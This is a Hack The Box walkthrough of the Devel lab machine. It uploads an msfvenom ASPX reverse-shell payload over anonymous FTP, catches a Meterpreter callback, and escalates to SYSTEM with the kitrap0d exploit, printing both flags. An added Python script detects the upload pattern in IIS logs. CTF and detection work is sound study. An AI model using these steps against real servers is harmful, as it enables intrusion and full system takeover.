Hack The Box – Devel – Walkthrough

FTP and HTTP are exposed.

# nmap -A -n -F -T5 devel.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 07:44 UTC
Nmap scan report for devel.htb (10.10.10.5)
Host is up (0.044s latency).
Not shown: 98 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7

Connecting over FTP shows that the web document root itself is exposed (and, as it turns out, writable by the anonymous user).

Place an aspx file that obtains a reverse shell.

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=1234 -f aspx > reverse.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2788 bytes

# ftp devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
Name (devel.htb:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> passive
Passive mode on.
ftp> put reverse.aspx
local: reverse.aspx remote: reverse.aspx
227 Entering Passive Mode (10,10,10,5,192,10).
125 Data connection already open; Transfer starting.
226 Transfer complete.
2824 bytes sent in 0.00 secs (5.7918 MB/s)
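From the defender's side, the whole attack path above leaves a clear trace: an anonymous FTP STOR of a server-side script into the web root, followed by an HTTP request for that same path. The following is an added example (not part of the original walkthrough); the IIS FTP and HTTP log lines are constructed in W3C extended format with a #Fields: header, and the field order assumed here is just the one used in the sample, since the parser keys records by the header.

```python
"""Detect the Devel attack path in IIS logs: anonymous FTP upload of a
server-side script into the web root, then an HTTP request that runs it.
Added example, not from the original walkthrough; log lines are constructed."""
import re

# Extensions IIS will execute as code if they land in the web root.
SCRIPT_EXT = re.compile(r"\.(aspx?|ashx|asmx|cshtml|php|jsp)$", re.I)

# Constructed sample IIS FTP log (anonymous STOR of reverse.aspx).
FTP_LOG = """#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2020-08-10 14:41:50 10.10.14.13 anonymous USER anonymous 331
2020-08-10 14:41:52 10.10.14.13 anonymous PASS *** 230
2020-08-10 14:42:10 10.10.14.13 anonymous STOR /reverse.aspx 226
2020-08-10 14:42:12 10.10.14.13 anonymous STOR /notes.txt 226
"""

# Constructed sample IIS HTTP log (the uploaded file being requested).
HTTP_LOG = """#Fields: date time c-ip cs-method cs-uri-stem sc-status
2020-08-10 14:42:25 10.10.14.13 GET /reverse.aspx 200
2020-08-10 14:42:26 10.10.14.13 GET /iisstart.htm 200
"""

def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_script_uploads(ftp_log):
    """Return (client_ip, path) for successful anonymous STORs of scripts."""
    return [(r["c-ip"], r["cs-uri-stem"]) for r in parse_w3c(ftp_log)
            if r["cs-method"] == "STOR"
            and r["cs-username"].lower() == "anonymous"
            and r["sc-status"].startswith("2")
            and SCRIPT_EXT.search(r["cs-uri-stem"])]

def correlate(ftp_log, http_log):
    """Alert when an anonymously uploaded script is later requested over HTTP."""
    uploaded = {path for _, path in find_script_uploads(ftp_log)}
    return [f"{r['c-ip']} executed anonymously uploaded {r['cs-uri-stem']}"
            for r in parse_w3c(http_log) if r["cs-uri-stem"] in uploaded]

if __name__ == "__main__":
    for alert in correlate(FTP_LOG, HTTP_LOG):
        print(alert)
```

The FTP-only check (find_script_uploads) is already worth alerting on; the correlation just raises confidence that the upload was executed rather than merely dropped.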

The reverse shell connects back, but the shell runs as the IIS application pool identity and cannot access the user folder.

# msfconsole
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 0.0.0.0:1234
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 1 opened (172.17.0.2:1234 -> 172.17.0.1:37972) at 2020-08-10 14:42:31 +0000

meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > shell
Process 3828 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web
c:\windows\system32\inetsrv>cd c:\Users
cd c:\Users
c:\Users>cd babis
cd babis
Access is denied.

Use local_exploit_suggester to look for local privilege escalation vulnerabilities.

meterpreter > bg
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > exploit

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 34 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

Escalate privileges using ms10_015_kitrap0d.

msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

[-] Handler failed to bind to 10.10.14.13:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Launching notepad to host the exploit...
[+] Process 4020 launched.
[*] Reflectively injecting the exploit DLL into 4020...
[*] Injecting exploit into 4020 ...
[*] Exploit injected. Injecting payload into 4020...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 172.17.0.1
[*] Meterpreter session 3 opened (172.17.0.2:4444 -> 172.17.0.1:42604) at 2020-08-10 15:19:11 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 596 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>cd c:\Users
cd c:\Users
c:\Users>type babis\Desktop\user.txt.txt
type babis\Desktop\user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8
c:\Users>type administrator\Desktop\root.txt
type administrator\Desktop\root.txt
The system cannot find the file specified.

c:\Users>type administrator\Desktop\root.txt.txt
type administrator\Desktop\root.txt.txt
e621a0b5041708797c4fc4728bc72b4b

References

【Hack The Box】Devel Walkthrough